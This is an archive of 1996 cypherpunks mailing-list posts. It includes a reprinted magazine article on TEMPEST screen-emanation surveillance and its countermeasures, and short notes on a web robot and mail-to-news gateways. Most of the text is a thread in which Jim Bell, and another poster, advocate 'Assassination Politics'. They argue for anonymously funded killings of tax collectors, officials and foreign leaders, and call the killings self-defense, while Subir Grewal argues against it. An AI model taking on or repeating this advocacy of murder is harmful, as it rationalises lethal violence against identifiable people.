132 West 43rd Street
New York, New York 10036

To subscribe to the ACLU Newsfeed, send a message to
majordomo@aclu.org with "subscribe News" in the body of the
message.  To terminate your subscription, send a message to
majordomo@aclu.org with "unsubscribe News" in the body of the
message.

For general information about the ACLU, write to info@aclu.org. -
---------------------------------------------------------------This
message was sent to the news





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Mon, 27 May 1996 10:43:01 +0800
To: cypherpunks@toad.com
Subject: Re: [SCARE]:  "If you only knew what we know..."
Message-ID: <9605262337.AA24223@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


On 26 May 96 at 12:23, Subir Grewal wrote:

> the
> struggle does not always have to be violent, and it hurts our cause
> to instigate violence when none has been used directly against us.

How would you qualify the seizing of 50+ % of our productive work?

Since only the productive work permits an individual to live, could
you say that they steal half of your life?  Why not?  Then, any tax
man targeted by AP who is past 1/2 the life expectency is getting an
"an eye for an eye" or better deal...

Are you telling that giving your wallet to a mugger is not done under 
violence directed against you since he did not shoot you or beat you 
in the first place?  Do you tell me that the fact that he did not use 
his gun means that there is no violence implied?

Under every pile of red-tape lies a fully loaded gun.  And *this* is 
what gives govt employees their attitude toward you.

Just some thoughts.

Ciao

JFA
...and actually, I am not even on CP mailing list...

PLEASE NOTE: THIS POST DOES NOT MEAN THAT I ENDORSE MR. BELL'S
SYSTEM.  MY RATIONNAL CONCLUSIONS ABOUT IT'S INTERNAL MECHANICS
AND IT'S INTRINSIC LOGICS DOES NOT MEAN THAT I LIKE NOR ENDORSE
THE SYSTEM. I SIMPLY CONCLUDED THAT IT IS IMPOSSIBLE TO PREVENT
THE SYSTEM FROM BEING IMPLEMENTED.  IMO, IT IS UNAVOIDABLE.

 DePompadour, Societe d'Importation Ltee  
 Limoges porcelain, Silverware and mouth blown crystal glasses

 JFA Technologies, R&D consultants.
 Physists, technologists and engineers.

 PGP keys at: http://w3.citenet.net/users/jf_avon
 ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Mon, 27 May 1996 10:55:50 +0800
To: cypherpunks@toad.com
Subject: Re: COMMUNITY CONNEXION ANNOUNCES WORLDWIDE BETA-TEST OF THE ANONYMIZER (fwd)
Message-ID: <Pine.SV4.3.91.960526200257.20061E-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


Date: Sun, 26 May 1996 14:17:38 -0400
From: Ralph Jennett <jennett@citicom.com>
To: Alan Horowitz <alanh@infi.net>

Of course the people at Community Connection know what you are up to when
you use their service.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 27 May 1996 14:44:14 +0800
To: Joined Trill <hostmaster@trill-home.com>
Subject: Re: [SCARE]:  "If you only knew what we know..."
Message-ID: <199605270314.UAA26114@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:39 PM 5/26/96 -0400, Subir Grewal wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>On Sun, 26 May 1996, jim bell wrote:
>
>:At 12:23 PM 5/26/96 -0400, Subir Grewal wrote:
>:Qualitatively, perhaps.  But quantitatively, no.  I think that blame for any
>:given situation or government behavior will be distributed in a reasonably
>:fair fashion, with those directly responsible for abuse becoming "dead meat"
>:while those on the periphery only marginal targets.  Your generous
>:interpretation of their guilt is certainly not binding on me.   And in any
>:case the fact that the people involved will usually be able to resign will
>:be a logical "out."
>
>Nor is your generous interpretation of the guilt of of hte peripheral
>binding on those who do not like them for whatever reason. 

True, but if I oppose and you don't, and my opposition results in their 
forced removal from office, what you believe will be irrelevant.

>Your
>suggestion is that open season be declared on those who work for the state
>(or are the state). 

They obtain their salary through theft from taxpayers.  I'd say that's 
plenty of an offense.

> Your claim is that one has to satisfy everyone
>(or the small minority that is unsatisfied might come out and kill you)
>andd the only way that will happen is when there is no state at all.

Or, at most, an exceedingly minimal one, operated by donation or extremely 
minor tax levels.


> Of
>course there are those who fervently believe in the socialist ideal and
>would probably feel justified in killing the do nothing libertarians (as
>opposed to old-style liberals, i.e. minimalists) who ostensibly form the
>state. 

But it wouldn't matter.  They wouldn't know who to target, and the people 
wanting to form a state have an inherent disadvantage against those who do 
not:  The act of forming the state identifies them.

> For them, inaction might be sufficient cause to initiate an AP
>campaign. 

How would you distinguish between just some ordinary citizen and somebody 
that ought to be targeted because of opposition to the state?  With my 
system, the latter can be silent and get the job done.

>Now what happens if one group feels another group's AP campaign
>is directly hurting their interests (for a smaller/larger state). 

Then there will be a fight, won by the group that isn't publicly recognized. 
 A group trying to form a centralized entity (and force this on others) will 
fail; those opposing it will win.


>Isn't
>there the possibility that they will begin to assign to the other's AP
>leaders the status of the state (after all their AP campaign is
>determining the nature of the state, and we can begin a reverse AP
>campaign on them to halt that). 

It doesn't work like that.  The act of formation of a state inevitably calls 
attention to oneself.  The act of opposing that formation does not.  AP is 
"biased," as it were, against centralized, organized political structure 
that arouses the ire of even a tiny fraction of the population.  A person 
who dedicates himself to ELIMINMATING the state, and does so anonymously, is 
difficult or impossible to target.


> The ideal of the minimalist state permits
>an out clause, so the socialists (or anyone who wants a paternal govt.)
>can form their own little community with their state acting as mother. 

I don't deny that a group of people can, willingly, form a subset of society 
where they agree to be bound by certain conditions that the rest of society 
does not tolerate.  However, the key word is "willingly."  If that 
mini-state ever becomes abusive of the rights of its own citizens, or 
becomes threatening of any outside individuals, its leaders will be 
targeted, either by its own citizens or those outside who feel threatened.


> If
>you envision "resigning" as a means of escaping being the target of AP,
>you must be aware that we don't forgive easily and there will be groups
>who wish to kill politicos who've "ruined our lives because of what they
>did x years ago". 

I have no problem with that.  That's just great.  Arbitrarily serious guilt 
should be followed by arbitrarily harsh punishement, even if it is years or 
decades later.  Resigning is in no way respected by the AP system per se, but it 
_may_ be considered by the average citizen to be a reason for mercy.

> If those who begin AP campaigns on "retired" govt.
>employees will be "playing unfairly" and your system has a clause to
>tackle them, I can see a group using a succession of politicos (each of
>whom gains amnesty by retiring after a bit) to accomplish what they wish
>to.

No, AP has no inherent ability to punish those who "play unfairly."  
However, the cost to purchase "predictions" (and the number of other 
citizens who share in this cost)  will probably depend substantially on the 
perceived guilt of the target, in the minds of others.  A person who 
resigns, and especially one who did little to directly anger the populace, 
other than to collect a stolen paycheck, is probably fairly safe.  An 
ex-employee of a particularly abusive government agency is, however, far 
more likely to remain  considered a legitimate target by the public.

>:I agree.  Which is why I'd much prefer a method to preferentially target a
>:relatively smaller number of people, and I've invented (discovered?) just
>:such a system.  Why not let it work?
>
>I'd prefer a system that doesn't "target" people at all.

Perhaps, but the current system does, and even after AP is instituted there 
will still be common criminals to keep down.

>:Why not kill those Iranian leaders, using AP?  And if you're afraid they'll
>:retaliate against "our" leaders, I see nothing wrong with that, either.
>:It's the leaders who maintain the dispute.
>
>Sure, and suppose the option is that there be no dispute at all.  So
>Rushdie (or you or I) becomes the sacrifical lamb, precisely because the
>"leaders" value their own lives, but ostensibly to kill the "dispute" in
>the bud. 

No, the donations will be made against those people who are actually seen by 
the people as the real problem.  In an "AP-world," there would be no 
"Islamic leaders" to call for Rushdie's death.  True, if an author like 
Rushdie said or wrote something that really angered a substantial number of 
people, they might individually be aroused enough to target him, but that is 
far less likely than ire directed by an Islamic leader today, I think.


> One of the fundamental principles of justice is that it be
>comensurate (in some sense) to the crime, AP lacks that aspect. 

I (and others) have predicted that there will indeed be "court systems" in 
place, although they will be numerous, competing, and voluntary, which will 
turn most offenses into crimes punishable by fines.  That will adjust the 
punishment to the crime, in most people's opinions.


>:Hey, I realized that long ago!  But I'm not under any illusion that this
>:system can be molded to conform to my wishes alone:  If I could, I'd become
>:a dictator and the cycle of tyranny would continue.
>
>The question is not one of becoming a dictator, but rather one of what
>values will be protected, what freedoms will people have in the
>world/state you imagine. 

No "values will be protected," except those that the individuals in society 
choose to be protected.


> I think the values AP engenders are not the ones we want. 

Who is "we"?

> We probably don't want to legitimize murder.

Don't call it "murder," then.  It's self-defense, at least by those who use 
it legitimately.

> It's difficult to
>operate in a vacuum of principles/values, we can't simply say, "well
>whatever people will want to happen will happen and why not give them that
>choice".

Ultimately, that's the way it's going to happen, UNLESS the society's 
control is waylaid by government.

>  Marx was not the first to poitn out that institutions influence
>our actions, that we are products of our times, that the choices we face
>are as much determined by our own preferences as they are by the world
>around us.  AP will create an environment where, I believe, an
>undesireable set of options will be presented to each of us.  This is
>the "outcome" argument, i.e. undesireable ends, the means themselves are
>reprehensible.

I wish I understood what you just said...


>:It isn't that it "has to" be violent.  Resignation is always an option.
>:Problem is, they don't want to give up their positions of power.
>
>You've heard about the elections where libertarian candidates ran for
>office with the objective of doing away with the office if they were
>elected.  I believe one such candidate won the election and came through
>on his promise.

Yes, that's great.  But I don't think we (the public) should have to depend 
on the good will of the elected officeholder, especially one who DIDN'T make 
such a promise.

>:That depends entirely on what your definition of instigating violence really
>:is.  I happen to believe that the act of collecting taxes, involuntarily, IS
>:the "instigation of violence" even if the victim gives up his assets without
>:a fight, if there is the prospect of eventual violence should he refuse to
>:cooperate.  Until you see this, you'll have a warped view of the propriety
>:of AP, not to mention the libertarian non-initiation of force  principle.
>:(NIOFP.)
>
>As I've said, the minimalist state is desireable in my opinion. 

But what is the minimum in "minimalist"?  I was a minarchist for a couple of 
decades, because I couldn't think of an intellectually consistent way to get 
rid of the last vestiges of government, permanently.  Now I can.


 The most
>efficient system of taxation is the truly flat tax (i.e. a fixed amount
>for each individual), since each person derives aprox. equivalent benefits
>from the minimalist state, their contributions are also equal.  Each of us
>derives some benefits from the existence of the state, some of these
>benefits are non-exclusionary.  Till these benefits are dependent on
>territory and jurisdiction taxation of those who reside within the
>jurisdiction/territory will have to be enforced. 

Sigh.  I'm afraid that kind of thinking has been obsoleted...

> You must of course, be
>aware of the medieval practice of making an offender an "outlaw", i.e. not
>under the protection of any laws.  These outlaws were then fair game for
>anyone.  When we have arrived at the point where the free-rider problem
>does not exist for things like national defense (i.e the shields won't
>exist over your property, and you'll enforce your ownership of it
>yourself) you will have the option (once again) of becoming an outlaw.

The whole concept of having to maintain "the national defense" is totally 
obsoleted by the stable anarchy formed by AP.  After AP, all defense will be 
local, because no large attacker could survive the "predictions" of the rest 
of the world.


>  I
>don't think it's going to be very pretty. 

I agree it sounds a bit scary, but that's mainly because it's so different 
from the current system.


> To bring up another subject, we
>make compromises. 

Reminds me of the old saying, "Democracy is two wolves and a sheep voting on 
what to have for dinner."

The problem with the concept of "compromises" is that it assumes that it is 
necessary to make those compromises.


> I personally find socialists endearing and am willing
>to make certain compromises to live with them amicably.

I don't care what they THINK, but if they try to enforce their society on me 
I'll feel no hesitancy to eliminate them.


> AP will draw
>battle-lines that will make such associations extremely hard to maintain.

No, it'll make compromises totally unnecessary.

>I'd rather not be the member of a "group" and have that membership/taint
>dictate the degree to which I can associate with a particular set of
>people.  AP, in providing "final solutions", will bring about a state of
>affairs where the actions of a particular group (which they think are
>legitimate and do not run counter to the rules of the game) will be
>unacceptable for another group and the "finality" of these actions will
>create rifts.  Violence does not beget peace.

Historically, that has been often true.  But then again, I think the rules 
have changed.  (or will soon change.)

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Mon, 27 May 1996 14:42:22 +0800
To: Stephan Somogyi <somogyi@digmedia.com>
Subject: Re: WhoWhere Robot strikes again
In-Reply-To: <v03006f00adccfdadcae2@[198.93.25.98]>
Message-ID: <Pine.GUL.3.93.960526201400.10152C-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


WhoWhere.com and ParsecWeb.com are being firewalled from all but a few
networks at stanford.edu, ucr.edu, and other places. This is a step I
recommend to others. 

Unfortunately, I have more important things to worry about than fighting
off threats from some petty net-abusing scam, but I'd be glad to give the
reasons privately.

-rich

On Sat, 25 May 1996, Stephan Somogyi wrote:

> I now have a WhoWhere Robot hitting one of my web servers from
> orion.parsecweb.com and it is most assuredly not honoring the
> robots.txt file regarding directories to exclude. I also just looked in
> the bot registry again and the WhoWhere Robot remains unlisted.
> 
> Needless to say, I'm denying accesses from parsecweb.com from here onward.
> 
> Stephan
> 
> ________________________________________________________________________
> Stephan Somogyi              Central Services              Digital Media





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Mon, 27 May 1996 11:40:58 +0800
To: cypherpunks@toad.com
Subject: Re: e-mail gateways to usenet
In-Reply-To: <31A8D4FD.352B@redshift.com>
Message-ID: <Pine.LNX.3.93.960526203108.1142A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 26 May 1996, O. C. Winton WN1Z wrote:

> Wonder if anyone would consider posting a list of currently
> functioning e-mail ways to post to usenet.  Would be useful for
> people like me who often use libraries' access to internet, and
> the libraries don't give newsgroup access.

There is a list at http://students.cs.byu.edu/~don/mail2news.html .

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
((2b) || !(2b))                 | Old key now used only for signatures
"The concept of normalcy is just a conspiracy of the majority" -me


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMaj4F7Zc+sv5siulAQGXQgP+O4vGS+Dz/tqGdeG82V6rhzTkdjutFGeY
sy44Xwuvq4EMd5HJaP4xwIV6YLIGOt0rxN77Ln2Gzi/KiYK+T5sdHuoWicWGgkN+
AZ5ZPUxHAJ2cEongPpBt3bCq1vHDBasXIehGxzivejLVoHz0rOf7pX6NYrYH6SHj
Bv7xE9WjM5A=
=G5Ks
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SpyKing <spyking@mne.net>
Date: Mon, 27 May 1996 13:29:44 +0800
To: (Recipient list suppressed)
Subject: Tempest Info
Message-ID: <9605270106.AA19474@mne.com>
MIME-Version: 1.0
Content-Type: text/plain


RISE of the TEMPEST
by Sarah Ellerman
Reprinted from Internet UnderGround Magazine
June 1996 Edition Pg. 42 thru 46

The unmarked government van slows and stops. The agent inside puts down his
coffee and starts in on the day's work: monitoring John Doe's computer, 10
blocks away. John is busy working on his Mac with the curtains pulled
against the morning sunlight. The agent watches with great interest as John
reads through the cryptography and privacy newsgroups, then downloads some
fiction from alt.sex.stories. Everything that flashes by on John's monitor
is videotaped for later review: the balance and payees of John's checking
account, some decrypted e-mail that John assumed was private and an illegal
copy of Adobe Photoshop. 

Is this scenario making you take stock of what appears on your computer
screen? We all indulge in vices large and small, mentally shrugging, "Who
will ever know?" In everyday life, we usually manage to keep our
transgressions secret, but when it comes to information flitting across our
computer screens, the answer is that there are no secrets, thanks to a
relatively new, obscure form of surveillance that's a threat to your privacy
and your civil rights. It's so secret that the Feds refuse to even release
its real name. Privacy advocates have filled the void by nicknaming this
technology "TEMPEST," which stands for "Transient Electromagnetic Pulse
Emanation Surveillance Technology." What it does is allow a simple scanning
device to read the output from your monitor from up to one kilometer away.
No one ever need enter your house to plant a bug or copy your floppies; it's
non invasive and virtually undetectable. You won't even know what hit you
until your name gets put on a list of troublemakers or the marshals come
busting down your door.

Here's how it works: There is an electron gun in the back of your monitor
which repeatedly fires electrons at your screen, causing different pixels to
illuminate and form the text or graphics that you see. The gun sweeps
rapidly up and down, sending an electromagnetic signal which constantly
refreshes the information displayed on the screen. This signal doesn't stop
at the perimeter of your computer; it continues expanding outwards, seeping
through the ether much like a radio wave. Exposed cables act as inadvertent
antennas, trans mitting the contents of your screen across your
neighborhood. Information even travels back along modem lines and power
cords, back into the walls and out into the world. These signals can be
easily reconstructed. What's more, a spy can differentiate between many
different units operating in the same room. The signals don't conflict or
jam each other as one might suspect. Even identical units send out distinct
signals because of slight differ ences in the manufacturing of various
components. You may not think it, but your PC is hardly a  self-contained
unit storing information privy to you alone. In fact, you're better off
thinking of it as a small-scale broadcast station operating out of your house.
                               
You may think, "So what if someone can see a screen?" Consider the test
conducted by security professionals for the Technical Assistance Group at
http://www. thecodex.com who actually jury-rigged their own Tempest scanning
device and took it for a test drive in downtown Manhattan this spring. As
described in an essay by CEO Frank Jones, their "DataScan" device (four
years in the making) enabled them to "view CRT screens at ATM machines,
banks, the local state lottery machine in a neighborhood candy store, a
doctor's office, the local high school, the fire department, the local
police department doing a DMV license plate check, a branch office of a
securities trader making a stock trade and the local gas station (owner)
tallying up his day's receipts...The U.S. Customs building (in NYC) leaks
information as well as the Federal Reserve. Wall Street itself was a wealth
of information for anyone interested. The World Trade Center was fertile. It
afforded open parking areas nearby with millions of glass windows to snoop.
We headed east toward the New York Post newspaper offices and read the
latest news off their monitors (which was printed the next day). We headed
north toward City Hall and NYPD Police Headquarters. Guess what? They're not
Tempest-certified either...Neither is the United Nations, any of the midtown
banks, Con Edison (the power company), New York Telephone on 42nd Street or
Trump Tower!"
   
Although this kind of eavesdropping has been featured in the media, most
people are unaware of the ease with which spies can virtually look over
their shoulder. Most react with incredulity swelling into anger and fear
when the technology is demonstrated to them. However, specialists agree that
the average person should not be unduly concerned with being spied on. "No,
by and large it's not used to crack down on the common criminal," says Winn
Schwartau, author of Information Warfare and Security Insider Report.
"You've got to look at the expense that goes into one of these things, the
eavesdropping vans and equipment. It's not cheap stuff to do at the very
highest levels. As a number of prosecutors have told me, 'I wish so many
people wouldn't be so paranoid. They don't know we don't have the time or
the budget to waste on them.' I wouldn't worry for the individual reader;
I'd worry for the corporation that has something of value."
   
Mike, an electronic surveillance specialist (who requested that we not print
his last name) and proprietor of the Chicago-area Discreet Electronics and
Security, Inc. at http://www.w2. com/docs2/z/spyshop. html, also warns the
public to keep things in perspective. "Let's say you are invaded, and
there's an outrage at the invasion. It may be that your federal rights were
violated... but so what?" he says. "One variable in how to assess
countermeasures and detec tion devices is to figure out how much damage
could happen to you as a result of your privacy being invaded." What could
someone find out from your screen that would be of enough value or interest
for them to go to the trouble and expense of getting a crack at your
intellectual property? Pure curiosity? Unlikely. A nasty divorce or child
custody case? The pur suit of a suspected hacker? A suspicion that you stole
company secrets? Maybe.
   
"If, on the other hand, you're involved in something that's rather
political, if you're suing an insurance company for a $500,000 worker's
compensation claim, boy, there's a lot involved here," Mike says. "And
they're going to do whatever they have to, believe it or not, to get their
information."

GOOD NEWS BAD NEW

Paranoid or protective U.S. citizens and companies can purchase snoop-proof"
Tempest-certified" computers for their own use. However, the high cost of
such a secure system may be prohibitive to consumers, says Jules Rutstein,
program manager for Secure Systems at Wang Federal, Inc. Even after paying
through the nose, information on how the computer was modified to meet the
undisclosed emissions standards is top-secret. Wang, found at
http://www.wangfed.com, a leading supplier of computers to the government,
offers an affordable alternative to Tempest products, called ZONE. Rutstein
explains, "The ZONE alternative is a lighter version of the full Tempest
program. The ZONE program is actually an endorsed program under NSA (the
National Security Agency.)" The cost of ZONE protection is significantly
less than Tempest-certified units, but Rutstein wouldn't provide IU with
definitive figures. "We try to price our ZONE products at what we consider
commercial prices. [I'm] ambivalent because it's so difficult to pin down
prices on PC products today...We've been selling it from the position that
you can purchase a ZONE product for virtually the same price as a normal
system. It's not costing you any more." IU pressed to find the exact
difference between the products, but emission levels are top secret
information, and ZONE can only be measured as relative to Tempest. It is
probably safe to say that ZONE products would be acceptable for the average
consumer's privacy needs, which is good news for those concerned enough with
security to purchase a new computer. The bad news is that you don't have the
highest level of security.
   
Information about exactly how the process works is veiled. Seminars on
building Tempest-certified equipment are only available to persons with
certain security clearances, and rumor has it that people attempting to talk
about Tempest are often silenced with the excuse that they're creating a
security threat. Rutstein says, "Tempest is a munitions controlled item,
which means that the export of the product is controlled. . . Currently the
only [foreign entities] we sell to are NATO governments." These prohibitions
protect the U.S. from acts of terrorism, but the secrecy surrounding Tempest
specifications creates a dilemma for citizens. The government's reticence
about standards prevents us from properly shielding the normal computers we
already own. We can guess what kind of emissions they're giving off and try
to suppress them, but without cold hard data, we can never rcally be sure.
Most people don't even know of the existence of the technology, much less
the exact shielding specifications. "It is not possible for the average
person to go to a database and find out what is Tempest certified and what
is not. I believe that perhaps that's the way the government wants it," says
Jones of the Technical Assistance Group.

Jones feels that citizens should be able to test emanations on their own. He
points out that "there are several ways of blocking unintended
transmissions, but how effective are they? The people who manufacture
shielding always say, 'it's great, it's effective,' but you don't really
know. But now there is a way to test it. We built a room and we used woven
shielding with the DataScan device and it did block emissions, but it didn't
block them to their specs. We had to use close to twice what they thought
was secure to actually make the room secure." Mike of Discreet Electronics
and Security, Inc. also comes out in favor of defensive countermeasures,
saying, "Used in the application of creating awareness, to show how
vulnerable let's say, a bank could be, it actually serves a very high and
valuable purpose. The idea here is to create an awareness, because most
people don't know, and what's frightening is that they don't know that they
don't know."

YEAH, BUT IS IT LEGAL?
   
Jones says it's somewhat unclear whether citizens can lawfully monitor
electromagnetic emanations. Depending on how one interprets the 1986
Electronic Communications and Privacy Act, it seems it could be legal.
According to Jones, the 1986 measure covers, in depth, that "it is illegal
to own, possess or use any device whose primary purpose is the surreptitious
interception of ora/ or data communications." How does this apply to Tempest
scanning devices? Well, that depends on how you define the word "data. "
  
Tempest works by picking up computer emanations that happen to seep into the
ether, remember? Those electrons were not created to transfer information to
another party; rather, they were created for putting images on a computer
screen, many theorize. "The emanations are not communications, it's not
'data' by the definition of the word," Jones says. "They are spurious
emissions that are nothing but white noise. It's garbage."
    
So what about the Act's clause that forbids the "interception of intended
communications?" That's where things get complicated, Schwartau admits.
    
"The key word there is 'intended,' that's exactly correct," Schwartau says.
"I've posed this question of Tempest interception to lawyers and judges. The
operational phrase came out of some of the cellular interception, the mobile
home phone interception: Those are intentional broadcasts, and interception
of those is clearly illegal." Schwartau says that legal colleagues agree
with Jones' assertion that intercepting unintentional, surreptitious
emanations from electronic equipment is not illegal. "However, there have
been other lawyers who've maintained--and these operate on the government
side--that "we'd find a way to get you."    

In the end, no matter how brilliant an argument lawyers can make that such
transmissions "don't count," there's only one interpretation that really
matters: namely, the definition decided on by the government. "That is the
end-all and be-all," says Mike of Discreet Electronics and Security, Inc.
"If the government says it's illegal, then guess what? It's illegal."
   
So although the consensus may be that current law leaves a convenient
loophole that technically permits Tempest monitoring, the prudent person
shouldn't risk it. "I can modify a black-and-white television set, with
seven cents in parts, to make it work. Does that make my TV illegal? No, of
course not," says Schwartau. "The equipment that the government uses to
monitor and test this type of equipment is open sale equipment. There are no
clearances required. "
   
Schwartau believes that even while providers' motivations in selling Tempest
scanning equipment may be questionable, it's clearly legal for them to sell
the stuff. Using it is another question. "lt's shaky ground if I'm going to
go out and intercept the signals surreptitiously, but you also have to ask
the question: How can you prosecute something that is passive and invisible?"
   
That's a good point and a chief concern for privacy advocates. This
monitoring is so non-invasive that most people will never even have a clue
that they were spied on. Many fear that the government will abuse their
privileged position as the keepers of Tempest standards and that the
situation could turn into an unconstitutional, one-sided information war. As
a consequence, there is a grass-roots movement of people learning to protect
themselves. In his article "Tempest in a Teapot" at
http:t/www.quadralay.com/ www/Crypt/Tempest/ tempest.html, Grady Ward notes
that concerned computer users can take a number of simple steps to reduce
compromising emanations.
   
Ward suggests keeping cables between components as short as possible, to
reduce the length of cable that acts as an antenna and to use only shielded
cable which is wrapped with metal to keep emissions within the sheath. He
recommends that users make sure that all computers and peripherals that they
use meet the Federal Communications Commission's Class B stan dard which
permits only one tenth the power of spurious emissions than the Class A
standard. Ward also instructs users to keep the cover on their computer, to
mount telephone-line filter products at the jack of the modem and to snap
metallic ferrite beads over all cables so that offending electromagnetic
emissions are used up in a heat sink instead of being released into the air.
   
Those who feel the need to protect truly valuable information can take
further steps by altering the rooms in which they work.
    
"You don't need the proverbial lead-lined room anymore," Jones says. "There
are composite non wovens that are similar to wallpaper that you can do a
room in: the walls, the ceiling, the floors. Paste the stuff on the walls
and then put paneling or regular wallpaper over it, and it pretty much makes
the room secure. It blocks the electromagnetic emissions from going out.
There also is translucent shielding similar to the sun tinting in an
automobile that you put on the windows."
   
Schwartau offers an alternative, saying, "The least expensive and easiest
way to do it is electromagnetic moire' pattern masking. That' a technique
using an inline box that plugs between the monitor and the video card on
your PC. It creates an electromagnetic moire pattern that for all intents
and purposes would keep out everybody but the absolutely most dedicated
national resources."
   
What's more, the active-matrix screens now built into laptops operate with
out electron guns and their emissions are much lower. When such screens are
commonly used as desktop monitors the possibility for being spied on will be
lessened.
   
Active matrix ? Electromagnetic moire? Isn't all this a little extreme ?
Maybe not. Privacy advocates note that Tempest monitoring is just one facet
of an information war in which the government has an unfair upper hand. We
probably don't need to remind you, but the U.S. government has not always
demonstrated the best judgment when it comes to emerging technologies,
individual rights or covert actions involving "dangerous"citizens.

The hope is that public indignation about Tempest monitoring will cause a
true tempest, a whirlwind of anger and official accountability. Only then
will we have the same tools and information as the Feds, bringing the battle
onto an even playing field.
   
Perhaps strife, outcry and controversy during this period of rapidly
emerging technology would not be such a bad thing. Consider these words from
Shakespeare's Orthello: "If after every tempest come such calms, may the
winds blow till they have waken'd death!"

You may view Jones' paper " Nowhere to Run...Nowhere to Hide...The
vulnerability of CRT's, CPU's and peripherals to TEMPEST monitoring" at:
http://www.thecodex.com/c_tempest.html

You may view Jones' DataScan TEMPEST monitoring device at:
http://www.thecodex.com/datscan.html



 

 


Check out our WEB SITE - The Codex Privacy Page
URL: http://www.thecodex.com

Home of The Codex Surveillance & Privacy Newsletter
DataScan - Diagnostic TEMPEST Evaluation System
Technical Surveillance CounterMeasures  (TSCM)
Forensic Audio Restoration & Audio Tape Enhancement  

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.7.1

mQCNAzDgc7MAAAEEAK1gzGapvWKn287T8QPYphpIzF6+uHAyf/shVPbrGD/f5v8i
sgMOSC5x05w9xyijpzx2ua5i4eXXzjiq257y7oJy60TEFWRHYqGJtZRpqlh9DKjD
0EA5dVitmEgKNot3rmcF9amBxUP2RwIq2nzHfgiLGB3obqeKYp0MXw7qZrH7AAUR
tB5TcHlLaW5nIDxzcHlraW5nQG5vdmFsaW5rLmNvbT4==UBv6

-----END PGP PUBLIC KEY BLOCK----- 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Haskovec <dhaskove@ucsd.edu>
Date: Mon, 27 May 1996 15:16:52 +0800
To: cypherpunks@toad.com
Subject: Re: Software Fame and Fortune
In-Reply-To: <199605251653.QAA15534@pipe2.t1.usa.pipeline.com>
Message-ID: <Pine.SUN.3.91.960526212453.10427C-100000@sdcc10.ucsd.edu>
MIME-Version: 1.0
Content-Type: text/plain


It is also available at http://www.economist.com/survey/software/ 


On Sat, 25 May 1996, John Young wrote:

> The EcoMist of May 25 has a special survey (80 kb) of the global software
> industry, which, the report claims, is the next fountainhead of computer
> fame and fortune, thanks to the Internet, and the successor to the H/W
> fairy tales. 
>  
>  
> It barely mentions crypto -- described as a prime commercial product of
> Israel's defense industry and the key to secure fame and fortune! 
>  
>  
> It can be read-only at: 
>  
>  
>      http://pwp.usa.pipeline.com/~jya/software.txt 
>  
>  
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephan Somogyi <somogyi@digmedia.com>
Date: Mon, 27 May 1996 15:20:13 +0800
To: cypherpunks@toad.com
Subject: Re: Software Fame and Fortune
In-Reply-To: <199605251653.QAA15534@pipe2.t1.usa.pipeline.com>
Message-ID: <v03006f03adcee11fecff@[198.93.25.98]>
MIME-Version: 1.0
Content-Type: text/plain


At 16:53 +0000 25.5.96, John Young wrote:

> It can be read-only at:

It can also be read on the Economist's own site at

<http://www.economist.com/surveys/software/>

________________________________________________________________________
Stephan Somogyi            Information Dispersal           Digital Media






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Subir Grewal <grewals@acf2.nyu.edu>
Date: Mon, 27 May 1996 13:24:22 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: [SCARE]:  "If you only knew what we know..."
In-Reply-To: <199605262337.QAA18778@mail.pacifier.com>
Message-ID: <Pine.ULT.3.92.960526205454.18312A-100000@acf2.NYU.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 26 May 1996, jim bell wrote:

:At 12:23 PM 5/26/96 -0400, Subir Grewal wrote:
:Qualitatively, perhaps.  But quantitatively, no.  I think that blame for any
:given situation or government behavior will be distributed in a reasonably
:fair fashion, with those directly responsible for abuse becoming "dead meat"
:while those on the periphery only marginal targets.  Your generous
:interpretation of their guilt is certainly not binding on me.   And in any
:case the fact that the people involved will usually be able to resign will
:be a logical "out."

Nor is your generous interpretation of the guilt of of hte peripheral
binding on those who do not like them for whatever reason.  Your
suggestion is that open season be declared on those who work for the state
(or are the state).  Your claim is that one has to satisfy everyone
(or the small minority that is unsatisfied might come out and kill you)
andd the only way that will happen is when there is no state at all.  Of
course there are those who fervently believe in the socialist ideal and
would probably feel justified in killing the do nothing libertarians (as
opposed to old-style liberals, i.e. minimalists) who ostensibly form the
state.  For them, inaction might be sufficient cause to initiate an AP
campaign.  Now what happens if one group feels another group's AP campaign
is directly hurting their interests (for a smaller/larger state).  Isn't
there the possibility that they will begin to assign to the other's AP
leaders the status of the state (after all their AP campaign is
determining the nature of the state, and we can begin a reverse AP
campaign on them to halt that).  The ideal of the minimalist state permits
an out clause, so the socialists (or anyone who wants a paternal govt.)
can form their own little community with their state acting as mother.  If
you envision "resigning" as a means of escaping being the target of AP,
